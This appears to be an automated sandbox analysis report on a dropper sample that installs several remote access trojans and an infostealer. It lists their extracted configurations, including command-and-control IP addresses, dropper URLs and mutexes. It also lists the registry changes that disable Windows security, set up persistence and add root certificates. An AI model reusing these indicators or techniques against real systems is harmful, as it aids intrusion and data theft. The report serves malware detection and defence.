asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
99s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
22-05-2024 09:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

asyncrat purelogstealer quasar xworm default office04 discovery evasion execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted

Family

xworm

Version

5.0

85.203.4.146:7000

5.182.87.154:7000

Mutex

eItTbYBfBYihwkyW

Attributes

Install_directory
%Userprofile%
install_file
svchost.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

85.209.133.18:4545

5.182.87.154:4449

Mutex

tdipywykihsjieff

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

79.132.193.215:4782

Mutex

f99ccef5-65c4-4972-adf2-fb38921cc9fc

Attributes

encryption_key
1C15E91ACCFAC60B043A1336CF6912EA8572BA83
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
taskhostw.exe
pastebin_url
https://pastebin.com/raw/Xuc6dzua

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

127.0.0.1:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
behavioral3/memory/8588-6507-0x00000000010A0000-0x00000000010B0000-memory.dmp	family_xworm
behavioral3/memory/6232-16764-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm
behavioral3/memory/7884-16803-0x0000000000AB0000-0x0000000000CD0000-memory.dmp	family_xworm
behavioral3/memory/3944-17127-0x0000000000FF0000-0x0000000001008000-memory.dmp	family_xworm

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

sysblardsv.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysblardsv.exe
PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysblardsv.exe

PureLog Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral3/memory/5060-16739-0x00000000006D0000-0x000000000071C000-memory.dmp	family_purelog_stealer
behavioral3/memory/1328-16749-0x0000000000790000-0x00000000007D8000-memory.dmp	family_purelog_stealer

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 3 IoCs

Processes:

resource	yara_rule
behavioral3/memory/5332-16455-0x0000000000E40000-0x0000000001164000-memory.dmp	family_quasar
C:\Windows\System32\Client.exe	family_quasar
behavioral3/memory/7416-16465-0x0000000000A50000-0x0000000000D74000-memory.dmp	family_quasar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysblardsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\win1.exe	family_asyncrat

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

103 5968 powershell.exe
104 6336 powershell.exe
106 6336 powershell.exe

flow	pid	process
103	5968	powershell.exe
104	6336	powershell.exe
106	6336	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
6336	powershell.exe
5968	powershell.exe
8912	powershell.exe
5920	powershell.exe
5016	powershell.exe
6376	powershell.exe
7440	powershell.exe
3708	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

print.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts print.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	print.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Possible privilege escalation attempt 32 IoCs

exploit

Processes:

icacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exe

pid	process
3672	icacls.exe
1044	takeown.exe
3884	takeown.exe
3264	icacls.exe
3980	icacls.exe
4432	takeown.exe
3352	icacls.exe
4736	icacls.exe
3992	takeown.exe
4292	icacls.exe
3712	takeown.exe
4468	icacls.exe
4376	icacls.exe
3736	icacls.exe
1000	icacls.exe
6244	takeown.exe
5496	icacls.exe
3420	icacls.exe
3308	takeown.exe
3452	takeown.exe
3796	takeown.exe
3836	icacls.exe
4056	takeown.exe
8616	icacls.exe
4536	takeown.exe
8076	takeown.exe
3480	icacls.exe
3628	takeown.exe
7840	icacls.exe
4328	takeown.exe
3392	takeown.exe
4124	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 42 IoCs

Processes:

eagleget-2-1-6-50.exeAntiVirus2.exeSetup.exesvchost.exewin1.exeoutput.exeSIG.EXEalabi.execrt.execrt.tmpsoundermidiplayer.exeoiii.exesoundermidiplayer.execonhost.exe7z.exe7z.exe7z.exesvcshost.exesdf34ert3etgrthrthfghfghjfgh.exekat4B14.tmpo2i3jroi23joj23ikrjokij3oroi.exekat5C72.tmpinte.exevpn-1002.exetdrpload.exeprint.exesysblardsv.exeupdater.exe222.exe7z.exe1212912448.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exePirate_24S.exe

pid	process
1864	eagleget-2-1-6-50.exe
684	AntiVirus2.exe
8456	Setup.exe
8588	svchost.exe
8664	win1.exe
1000	output.exe
2548	SIG.EXE
3008	alabi.exe
4600	crt.exe
8372	crt.tmp
4988	soundermidiplayer.exe
5180	oiii.exe
5584	soundermidiplayer.exe
8552	conhost.exe
2824	7z.exe
2124	7z.exe
2584	7z.exe
548	svcshost.exe
3252	sdf34ert3etgrthrthfghfghjfgh.exe
3436	kat4B14.tmp
5680	o2i3jroi23joj23ikrjokij3oroi.exe
5812	kat5C72.tmp
7700	inte.exe
8404	vpn-1002.exe
908	tdrpload.exe
7676	print.exe
6132	sysblardsv.exe
480
3772	updater.exe
5216	222.exe
2252	7z.exe
8572	1212912448.exe
9180	7z.exe
320	7z.exe
2872	7z.exe
2992	7z.exe
2956	7z.exe
1496	7z.exe
3244	7z.exe
3444	7z.exe
3784	Installer.exe
4708	Pirate_24S.exe

Loads dropped DLL 55 IoCs

Processes:

New Text Document mod.exeSetup.exeoutput.execrt.execomp.execrt.tmpFUT.au3WerFault.execmd.exe7z.exe7z.exe7z.exesdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exevpn-1002.execmd.exesysblardsv.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
2740	New Text Document mod.exe
8456	Setup.exe
8456	Setup.exe
8456	Setup.exe
1000	output.exe
4600	crt.exe
8636	comp.exe
8372	crt.tmp
8372	crt.tmp
8372	crt.tmp
8372	crt.tmp
8372	crt.tmp
2740	New Text Document mod.exe
2996	FUT.au3
6456	WerFault.exe
6456	WerFault.exe
6456	WerFault.exe
6456	WerFault.exe
6456	WerFault.exe
9184	cmd.exe
2824	7z.exe
9184	cmd.exe
2124	7z.exe
9184	cmd.exe
2584	7z.exe
3252	sdf34ert3etgrthrthfghfghjfgh.exe
3252	sdf34ert3etgrthrthfghfghjfgh.exe
5680	o2i3jroi23joj23ikrjokij3oroi.exe
5680	o2i3jroi23joj23ikrjokij3oroi.exe
8404	vpn-1002.exe
2740	New Text Document mod.exe
2740	New Text Document mod.exe
480
8420	cmd.exe
6132	sysblardsv.exe
6132	sysblardsv.exe
2252	7z.exe
8420	cmd.exe
9180	7z.exe
8420	cmd.exe
320	7z.exe
8420	cmd.exe
2872	7z.exe
8420	cmd.exe
2992	7z.exe
8420	cmd.exe
2956	7z.exe
8420	cmd.exe
1496	7z.exe
8420	cmd.exe
3244	7z.exe
8420	cmd.exe
3444	7z.exe
8420	cmd.exe
8420	cmd.exe

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	process
7840	icacls.exe
3712	takeown.exe
1044	takeown.exe
4736	icacls.exe
1000	icacls.exe
3796	takeown.exe
4124	takeown.exe
6244	takeown.exe
4536	takeown.exe
8076	takeown.exe
3420	icacls.exe
3980	icacls.exe
4056	takeown.exe
3672	icacls.exe
3736	icacls.exe
3836	icacls.exe
8616	icacls.exe
4376	icacls.exe
4468	icacls.exe
3308	takeown.exe
3392	takeown.exe
3480	icacls.exe
3628	takeown.exe
3992	takeown.exe
4432	takeown.exe
3352	icacls.exe
3452	takeown.exe
3884	takeown.exe
4292	icacls.exe
3264	icacls.exe
4328	takeown.exe
5496	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysblardsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SIG.EXEtdrpload.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe"	SIG.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe"	tdrpload.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

16 raw.githubusercontent.com
220 raw.githubusercontent.com
221 raw.githubusercontent.com
15 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

31 ip-api.com

flow	ioc
16	raw.githubusercontent.com
220	raw.githubusercontent.com
221	raw.githubusercontent.com
15	raw.githubusercontent.com

flow	ioc
31	ip-api.com

Suspicious use of SetThreadContext 6 IoCs

Processes:

Setup.exeSIG.EXEsdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exeupdater.exe

description	pid	process	target process
PID 8456 set thread context of 8636	8456	Setup.exe	comp.exe
PID 2548 set thread context of 6724	2548	SIG.EXE	csc.exe
PID 3252 set thread context of 3436	3252	sdf34ert3etgrthrthfghfghjfgh.exe	kat4B14.tmp
PID 5680 set thread context of 5812	5680	o2i3jroi23joj23ikrjokij3oroi.exe	kat5C72.tmp
PID 3772 set thread context of 3868	3772	updater.exe	conhost.exe
PID 3772 set thread context of 4208	3772	updater.exe	conhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

oiii.exe

description ioc process

File created C:\Program Files\Windows Media Player\background.jpg oiii.exe
Drops file in Windows directory 2 IoCs

Processes:

tdrpload.exe

description ioc process

File created C:\Windows\sysblardsv.exe tdrpload.exe
File opened for modification C:\Windows\sysblardsv.exe tdrpload.exe
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5352 sc.exe
3180 sc.exe
5468 sc.exe
3332 sc.exe
3460 sc.exe
3616 sc.exe
3592 sc.exe
4496 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6456 2996 WerFault.exe FUT.au3
6460 4880 WerFault.exe nine.exe

description	ioc	process
File created	C:\Program Files\Windows Media Player\background.jpg	oiii.exe

description	ioc	process
File created	C:\Windows\sysblardsv.exe	tdrpload.exe
File opened for modification	C:\Windows\sysblardsv.exe	tdrpload.exe

pid	process
5352	sc.exe
3180	sc.exe
5468	sc.exe
3332	sc.exe
3460	sc.exe
3616	sc.exe
3592	sc.exe
4496	sc.exe

pid	pid_target	process	target process
6456	2996	WerFault.exe	FUT.au3
6460	4880	WerFault.exe	nine.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

kat4B14.tmpkat5C72.tmp

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	kat4B14.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	kat5C72.tmp

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4820 schtasks.exe
5600 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

7148 tasklist.exe
3504 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1004 taskkill.exe
3628 taskkill.exe

pid	process
4820	schtasks.exe
5600	schtasks.exe

pid	process
7148	tasklist.exe
3504	tasklist.exe

pid	process
1004	taskkill.exe
3628	taskkill.exe

Modifies system certificate store 2 TTPs 18 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

eagleget-2-1-6-50.exeNew Text Document mod.exekat4B14.tmpkat5C72.tmpvpn-1002.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	eagleget-2-1-6-50.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	kat4B14.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	kat5C72.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82